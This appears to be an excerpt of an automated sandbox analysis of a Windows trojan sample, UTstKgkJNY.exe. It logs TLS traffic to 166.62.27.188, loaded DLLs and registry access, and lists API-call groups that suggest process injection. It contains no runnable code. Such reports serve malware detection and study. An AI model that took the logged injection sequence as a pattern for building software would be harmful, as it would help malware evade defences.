            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
            Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
            Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
            Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
            Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
            Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
            Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
            Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
            Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
            Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
            Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49762 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49786 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49799 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49809 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49822 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49835 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49847 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49860 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49871 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49884 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49895 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49906 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49919 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49932 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49944 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49958 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49967 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49980 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:49991 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50004 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50018 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50028 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50034 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50036 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50039 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50041 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50043 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50045 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50047 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50049 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50051 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50053 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50055 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50057 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50059 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50061 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50063 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50065 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50067 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50069 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50071 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50073 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50075 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50077 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50079 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50081 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50083 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50085 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50087 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50089 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50091 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50091 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50093 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50095 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50097 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50099 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50101 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50103 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50105 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50107 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50109 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50111 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50113 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50115 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50117 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50119 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50121 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50123 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.10:50125 version: TLS 1.2
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0287DFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,1_2_0287DFE4
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_02877CF8 NtWriteVirtualMemory,1_2_02877CF8
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_02878BA6 GetThreadContext,SetThreadContext,NtResumeThread,1_2_02878BA6
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_02878BA8 GetThreadContext,SetThreadContext,NtResumeThread,1_2_02878BA8
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0287DE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,1_2_0287DE24
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0287DE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,1_2_0287DE78
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0287DF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,1_2_0287DF00
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0287F0A8 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,1_2_0287F0A8
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_028620C41_2_028620C4
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0288E59A1_2_0288E59A
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: String function: 028646A4 appears 244 times
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: String function: 028644D0 appears 33 times
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: String function: 02878798 appears 54 times
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: String function: 0286480C appears 931 times
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: String function: 0287881C appears 45 times
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: String function: 028644AC appears 74 times
            Source: UTstKgkJNY.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: classification engineClassification label: mal76.troj.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_02867F54 GetDiskFreeSpaceA,1_2_02867F54
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_02876D48 CoCreateInstance,1_2_02876D48
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: UTstKgkJNY.exeReversingLabs: Detection: 68%
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeFile read: C:\Users\user\Desktop\UTstKgkJNY.exeJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: url.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: smartscreenps.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: winhttpcom.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
